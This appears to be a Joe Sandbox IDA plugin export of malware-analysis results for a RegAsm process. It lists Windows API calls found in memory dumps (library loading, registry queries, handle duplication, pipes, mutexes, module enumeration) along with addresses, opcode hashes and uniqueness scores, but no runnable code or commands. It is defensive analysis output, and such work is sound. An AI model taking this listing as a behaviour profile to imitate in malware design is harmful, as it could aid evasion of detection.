LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1e0d5e1f1972b946d39963e0731ea15f4ffb84b83825703a537d1df111d5c8e
Instruction ID: 6e5ec359af574dcb27c65a3fd70d53a1316e046079349e1af25aee35e4383a07
Opcode Fuzzy Hash: c1e0d5e1f1972b946d39963e0731ea15f4ffb84b83825703a537d1df111d5c8e
Instruction Fuzzy Hash: 4F31ACD294FBF189CF27A62840A831B3FA049B311639A46D9C0830F84AE5984020EBB3

Uniqueness

Uniqueness Score: 0.02%

Function 011275C0, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b8eb375d563984d8b9add8b16477b021662c4a2d9a4bdd213152309c7fe3bf8e
Instruction ID: 8a25102e583fe1285ec4a8baf9059d7880b28dac5617c8db7225fca0737a491f
Opcode Fuzzy Hash: b8eb375d563984d8b9add8b16477b021662c4a2d9a4bdd213152309c7fe3bf8e
Instruction Fuzzy Hash: 4831A9C290EBF1C9CF3BA62844E83573FA149B311579B42D9D4834E84AE1984071EBF3

Uniqueness

Uniqueness Score: 0.02%

Function 1FD2AB72, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000EAC), ref: 1FD2AC31

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b5797f472dc7e6e9d3ffb93b027266dac2d414b7367afacfab8471be900b4938
Instruction ID: 4eaf7af0ea87f7ce57f0d696e20fe5174fb423ec26263ae4fe137fa372f99c01
Opcode Fuzzy Hash: b5797f472dc7e6e9d3ffb93b027266dac2d414b7367afacfab8471be900b4938
Instruction Fuzzy Hash: AB31B6725083846FE7128B24CC44FA7BFBCDF46614F0885DBE9819B153D264A909C772

Uniqueness

Uniqueness Score: 0.01%

Function 22920E9C, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000EAC), ref: 22920F3B

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6dbb126b771f3bc227a6f6951571e1e6f7d3004f47518e3bec10b63852fa3665
Instruction ID: 90490e2bdc331d0414f2b3bb62f9f9a698d045c02ed987812e0ca7907289f589
Opcode Fuzzy Hash: 6dbb126b771f3bc227a6f6951571e1e6f7d3004f47518e3bec10b63852fa3665
Instruction Fuzzy Hash: 2931B671504344AFE7228F65DC44FABBBBCEF45320F04899EF985DB152D264A505CB71

Uniqueness

Uniqueness Score: 0.12%

Function 22920CA4, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000EAC), ref: 22920D43

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ae0eef5e1ace42445a98c1d271bada8b571952ebe7ce0190e34675d88f15ee46
Instruction ID: 58e4e7cf2b29bdca9068d45dafdd5efc7bcfe24425d59a9c4b7b5b05ae4f8d1a
Opcode Fuzzy Hash: ae0eef5e1ace42445a98c1d271bada8b571952ebe7ce0190e34675d88f15ee46
Instruction Fuzzy Hash: 1431D472504344AFE7228F65DC44FABBBACEF45220F04899EF985CB252D264A509CBB1

Uniqueness

Uniqueness Score: 0.12%

Function 22920BAE, Relevance: 1.6, APIs: 1, Instructions: 93pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE(?,00000EAC,?,?), ref: 22920C6E

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: c073fddf09bdaf09007980b2555a64387280e49999a4c03171a55467b9b3c352
Instruction ID: a4f28abcf6f8e6a192791fa5480710a47caaf3de0b6029605a9caa16fc903174
Opcode Fuzzy Hash: c073fddf09bdaf09007980b2555a64387280e49999a4c03171a55467b9b3c352
Instruction Fuzzy Hash: DF317E7150E3C06FD3138B318C65A56BFB4EF47610F1A85DBD884CF6A3D229A909C7A2

Uniqueness

Uniqueness Score: 0.34%

Function 22922218, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 229222CA

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 4f6a6ddc3db765a622e054c389a715eafddd9c81676d660bb9f48ee0b3fe9786
Instruction ID: 88f37cb5d35a2263d69999e14f47ca9bee77ee3b57a6b3e07b1db4fb924b3a28
Opcode Fuzzy Hash: 4f6a6ddc3db765a622e054c389a715eafddd9c81676d660bb9f48ee0b3fe9786
Instruction Fuzzy Hash: 4031E6724093849FE712CF24DC45F96FFB8EF06314F0485DAE9848B253D365A609C761

Uniqueness

Uniqueness Score: 0.42%

Function 01127529, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92a43c986af74075ddb8c7d9bb3ce2f65d4c580b40a25ce6d9e9dfae15faabb1
Instruction ID: a1a5099157f088a3de302c85237def1e4d8f6424c5e5768fe02deee3656f6400
Opcode Fuzzy Hash: 92a43c986af74075ddb8c7d9bb3ce2f65d4c580b40a25ce6d9e9dfae15faabb1
Instruction Fuzzy Hash: 2B2115C290EBF1D8DF3F662844A477B3E654AB3115B5705DAD4430E486E3980074DBB3

Uniqueness

Uniqueness Score: 0.02%

Function 22921227, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229212DC

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a1b6d96f61cbd11a7b8d6f32db0cc4a3623694435a92e2290fa44f434106abd7
Instruction ID: 6902e371a2e8687a912bec515482b76fdec6e7d6d35bbd5d758feb606cbe9a88
Opcode Fuzzy Hash: a1b6d96f61cbd11a7b8d6f32db0cc4a3623694435a92e2290fa44f434106abd7
Instruction Fuzzy Hash: 8131A1711087845FEB22CB64CC44B96BFB8EF46310F08859AE9859B267D264E508CBB1

Uniqueness

Uniqueness Score: 0.02%

Function 22920864, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 22920905

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4671805fde4074f9e410ffce0474f613d081327c7e03f3ffdd3fe37b23864d1b
Instruction ID: c7b146fc35fe0e5346caf1d70bdaa4593f9fbe90780c6892f569b0fd7a0553ea
Opcode Fuzzy Hash: 4671805fde4074f9e410ffce0474f613d081327c7e03f3ffdd3fe37b23864d1b
Instruction Fuzzy Hash: A3319C71504384AFE722CF65DD44F66BBE8EF09220F08859EE9858B252D365E908CB71

Uniqueness

Uniqueness Score: 0.01%

Function 1FD2AC79, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 1FD2AD34

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3d362e451a5846b07a3da02ad0a463eaaf6e257a19e6604f49905874199dc4e1
Instruction ID: 88807e5290bf82420a0e4eef7078908dcaa3177eb795902872871b14a40c3b09
Opcode Fuzzy Hash: 3d362e451a5846b07a3da02ad0a463eaaf6e257a19e6604f49905874199dc4e1
Instruction Fuzzy Hash: D331B3711093845FE722CF25DC84FA6BFF8EF46714F08859AE885CB253E264E548CBA1

Uniqueness

Uniqueness Score: 0.02%

Function 2292278C, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 22922829

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: d1b29c3c74a6c86511aaa3d1034d78cd59aa9d024afe17816b3839ddd1f5f195
Instruction ID: 26c203161359d9ba1b8d295824f0c2b3d425ef2081b206e36eb42931363dcb56
Opcode Fuzzy Hash: d1b29c3c74a6c86511aaa3d1034d78cd59aa9d024afe17816b3839ddd1f5f195
Instruction Fuzzy Hash: 9731F7725097806FE7128F25DC44F96BFB8EF06320F0885DAE8858F153D264A509CB71

Uniqueness

Uniqueness Score: 0.52%

Function 01127574, Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9739797f7a40507759af20b44d33fb7945ced5f8f79963685d6ef1b2b2e7e136
Instruction ID: 55dbbf8e04d26364618765b57e0637dc02f079b9245311b40bb15188deeebe13
Opcode Fuzzy Hash: 9739797f7a40507759af20b44d33fb7945ced5f8f79963685d6ef1b2b2e7e136
Instruction Fuzzy Hash: 5E210EC2A0EBF1D8DF3F662844A837B3E614AB3115B5706DAD4430E48AE3980074DBB3

Uniqueness

Uniqueness Score: 0.02%

Function 22921E82, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 22921F2C

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6fa861acdce127bfd0f5d163dc6be568a6bc5ee0cbc8cad20f62eb8eafaeb46e
Instruction ID: 381c1a4f669392dac39826cc10db749e600ad09db0c099a730ae147c551b2490
Opcode Fuzzy Hash: 6fa861acdce127bfd0f5d163dc6be568a6bc5ee0cbc8cad20f62eb8eafaeb46e
Instruction Fuzzy Hash: 0431B1B21097846FE722CB25CC40F96BFB8EF06314F0885DAE9858B263D364A509CB71

Uniqueness

Uniqueness Score: 0.02%

Function 2292095C, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229209F1

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5155a33ac43a4f8f6f06ec439109fead390a73a88106553a4d9115196440f97e
Instruction ID: a745415f79098291b30a70352220f7d903eb89a60d47c94f8ba305ddd12f9559
Opcode Fuzzy Hash: 5155a33ac43a4f8f6f06ec439109fead390a73a88106553a4d9115196440f97e
Instruction Fuzzy Hash: D731C5B54097C46FE3128B259C55BA6BFB8EF43220F1881DBE8848F197D364A549C772

Uniqueness

Uniqueness Score: 0.09%

Function 229224CD, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 2292256D

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 414f992cece1c2de209d3761d40007d7780cbd36a545fbfd567ebb321bba21ba
Instruction ID: efe87974f1507976c944d64e3ca79d6f6c8eae75add745efd5ab7d917cdb2cad
Opcode Fuzzy Hash: 414f992cece1c2de209d3761d40007d7780cbd36a545fbfd567ebb321bba21ba
Instruction Fuzzy Hash: D031B1B1509384AFE711CF25CD95F56FFFCEF06210F08859AE9848B292D364E908CB61

Uniqueness

Uniqueness Score: 0.03%

Function 22923122, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229231BA

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 68c4cffb4a65926c6c483e70c3ca7dc2eafb6b5896b43677c884bc66376a5cb8
Instruction ID: 3a6bd196ea0787374273314eb547aabe4970d4969a842c3bbee4c50f940f319a
Opcode Fuzzy Hash: 68c4cffb4a65926c6c483e70c3ca7dc2eafb6b5896b43677c884bc66376a5cb8
Instruction Fuzzy Hash: 0E21E4B25097C46FE7128B25DC54BA6BFB8EF06320F0885DAE9C48F253D264A508C771

Uniqueness

Uniqueness Score: 0.61%

Function 2292113E, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000EAC), ref: 229211D2

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b5fd0eaeb360e1cfbb5aeb688bf2902007a1941b1e588223f971a51edc4a0fd1
Instruction ID: 0bd801a5e5e3d162518c77b262d923d8a407081d0d9c7abf5a5cd19c9efcbc35
Opcode Fuzzy Hash: b5fd0eaeb360e1cfbb5aeb688bf2902007a1941b1e588223f971a51edc4a0fd1
Instruction Fuzzy Hash: 64218DB2505344AFE7228B65DC44F6AFFBCEF45220F08859AED459B253D264A608CB72

Uniqueness

Uniqueness Score: 0.01%

Function 22923219, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229232AA

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: c761c177fecb8b7c4f31ff19b3f478a77b870bbb58d5c3d3fd58b7f66a53bbaf
Instruction ID: 1d3c68546fe709d782533c329d4dfebdcbff0c534564e6999abcba66452b6bcb
Opcode Fuzzy Hash: c761c177fecb8b7c4f31ff19b3f478a77b870bbb58d5c3d3fd58b7f66a53bbaf
Instruction Fuzzy Hash: B621B171509384AFE722CB25DC44FA6BFACDF46220F08859AE944DB252D264E908CB71

Uniqueness

Uniqueness Score: 1.47%

Function 229206B2, Relevance: 1.6, APIs: 1, Instructions: 81UNIQUE

Download Yara Rule

APIs

GetFileSecurityW.KERNELBASE(?,?,?,?,3CB76BEB), ref: 22920749

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileSecurity
String ID:
API String ID: 200422441-0
Opcode ID: 2d6790deab0941723a10d4c6a202a660182f556e380b21ad878f5a5c75dc1e00
Instruction ID: 8de2ef53dd3f2994e6fb37f43db2e70982b80237b436ad931133b3fefc245535
Opcode Fuzzy Hash: 2d6790deab0941723a10d4c6a202a660182f556e380b21ad878f5a5c75dc1e00
Instruction Fuzzy Hash: B0315C7150E7C05FD7138B24DC51B52BFB8AF57214B0985DBE884CF2A7D2249908CB72

Uniqueness

Uniqueness Score: 100.00%

Function 22923310, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EAC,?,?), ref: 229233B6

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 031f4552c1dfb14c8e465ceb387cb2f2fc7f2a2d03e6ea2778fbf1fa1b7e7800
Instruction ID: 4c5f6045cc96eb7c572345ab039649d7e0658e1547309cd6d30ebd32ca3bcfea
Opcode Fuzzy Hash: 031f4552c1dfb14c8e465ceb387cb2f2fc7f2a2d03e6ea2778fbf1fa1b7e7800
Instruction Fuzzy Hash: EC21B1715093C06FD312CB61CC55B66BFB8EF87610F0981DBD8848B2A3D224A909C7B2

Uniqueness

Uniqueness Score: 0.15%

Function 22920EBE, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000EAC), ref: 22920F3B

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bbb41580297391cd00d974fcbad1f8f60df075c293ea6939dd29bb4ca163ba3d
Instruction ID: 438cd32f417adafc80f505fe0c44e947d43978c86f0e11e01282777c97783aeb
Opcode Fuzzy Hash: bbb41580297391cd00d974fcbad1f8f60df075c293ea6939dd29bb4ca163ba3d
Instruction Fuzzy Hash: 9A21C471500708AFEB21CF65DC44FAAF7ACEF44320F048A6AED45DB256D674A544CBB1

Uniqueness

Uniqueness Score: 0.12%

Function 229218D7, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,?,?), ref: 2292197A

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f572bf6ce837ff06f38373d9ee4101eb6880ce5514e168856a5987e87e3678f3
Instruction ID: e1a4fcf87a6df3a2de2cdb47b56572c4efa7f2443c939bcae354c62548c48ca3
Opcode Fuzzy Hash: f572bf6ce837ff06f38373d9ee4101eb6880ce5514e168856a5987e87e3678f3
Instruction Fuzzy Hash: 2721B57550D3C06FD3138B218C51B62BF74EF87610F0981CBEC848B653D225A919C7B2

Uniqueness

Uniqueness Score: 0.02%

Function 22920CC6, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000EAC), ref: 22920D43

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2c9a9a9ae248624bef28359ecbfb010ef5edb00f813763e5889fd48a40124e0b
Instruction ID: 261eff511fae75042200323fc3ac865d6db646f8a336e0f21e66ba0f4a6f1d5a
Opcode Fuzzy Hash: 2c9a9a9ae248624bef28359ecbfb010ef5edb00f813763e5889fd48a40124e0b
Instruction Fuzzy Hash: 4F21C472500708AFEB218F64DC44F6AF7ACEF44320F048A6AED458B256D671A544CBB1

Uniqueness

Uniqueness Score: 0.12%

Function 01127658, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 20065bbc795e510ff638392353f7bf1ca62f7ed6a44530f1f3be6a4dca2ae1cb
Instruction ID: 3833e2d1efbde4008f7094c9ca6c73c5e0080f1a5781278715944ebdb8566e93
Opcode Fuzzy Hash: 20065bbc795e510ff638392353f7bf1ca62f7ed6a44530f1f3be6a4dca2ae1cb
Instruction Fuzzy Hash: 951124C290EBF5D9CF3F662844A836B3EA14AB3115B5A45D9D4430E48AE3980070D7B3

Uniqueness

Uniqueness Score: 0.02%

Function 2292106C, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNELBASE(?,00000EAC,?,?), ref: 22921112

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 2d843a417c7dfdc8e6832caa9946ba0b7a0b765ba8fb082e57f7d6add75b215b
Instruction ID: 76b3426c47279fe1c3ae32501d99e8f7d20325d9a827d1f1734445161c9303ae
Opcode Fuzzy Hash: 2d843a417c7dfdc8e6832caa9946ba0b7a0b765ba8fb082e57f7d6add75b215b
Instruction Fuzzy Hash: 0C21817550E3C06FC3138B758C55A12BFB4EF87610F1D81CFD8848B6A3D225A919C7A2

Uniqueness

Uniqueness Score: 0.05%

Function 22922136, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 229221C1

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 3cd6574a4e0abe925642903715a0889d25f525d5133cb1186b663145adc3da5e
Instruction ID: c3f0ab9586dd6baa15401d56f38dee781c68af4e21328f2ca537543c2d8cd475
Opcode Fuzzy Hash: 3cd6574a4e0abe925642903715a0889d25f525d5133cb1186b663145adc3da5e
Instruction Fuzzy Hash: E721A371509384AFE711CB65DC45F56FFA8EF05220F08859EED848B292D375E508CB72

Uniqueness

Uniqueness Score: 0.52%

Function 22DE2569, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 22DE25BC

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 879527443630f3bcca2351c0adbe39415f3738deb7f614d8300031cf149df676
Instruction ID: b65759520e3233ee8e7c160af2b6983c61291641b7e5739aebffa8662e31671f
Opcode Fuzzy Hash: 879527443630f3bcca2351c0adbe39415f3738deb7f614d8300031cf149df676
Instruction Fuzzy Hash: 7E21D370E54349CFD714CF78C9A979E7BB3AB94300F14846ED40AAB344DBB48A45CB90

Uniqueness

Uniqueness Score: 0.02%

Function 011276A0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 28c8d8c9a8ff8e58bd0ffc3e7f4a903c4eee365af136bdab60fa334c44e1678b
Instruction ID: b7e171aec627f948fb9330ef696935072ea994a201c103fc8bff735145812b6f
Opcode Fuzzy Hash: 28c8d8c9a8ff8e58bd0ffc3e7f4a903c4eee365af136bdab60fa334c44e1678b
Instruction Fuzzy Hash: D51119C190EBF5D9CF3F762844E836B3EA14AB3115B5B45D9D4430E48AE2984074D7B3

Uniqueness

Uniqueness Score: 0.02%

Function 22920886, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 22920905

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 91440629d84cd2aa0dac676614412d59bb33fd619e4460aeac905a6cf537d340
Instruction ID: 0f7698b40f6a1b6cbb4bc4a3cbc711318774abf70db7240a0d4906cabaec2c44
Opcode Fuzzy Hash: 91440629d84cd2aa0dac676614412d59bb33fd619e4460aeac905a6cf537d340
Instruction Fuzzy Hash: 5421AE71500744AFEB20CF65DD84F66FBE8EF08220F0486AAE9898B256D771E544CB72

Uniqueness

Uniqueness Score: 0.01%

Function 1FD2ABB2, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000EAC), ref: 1FD2AC31

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

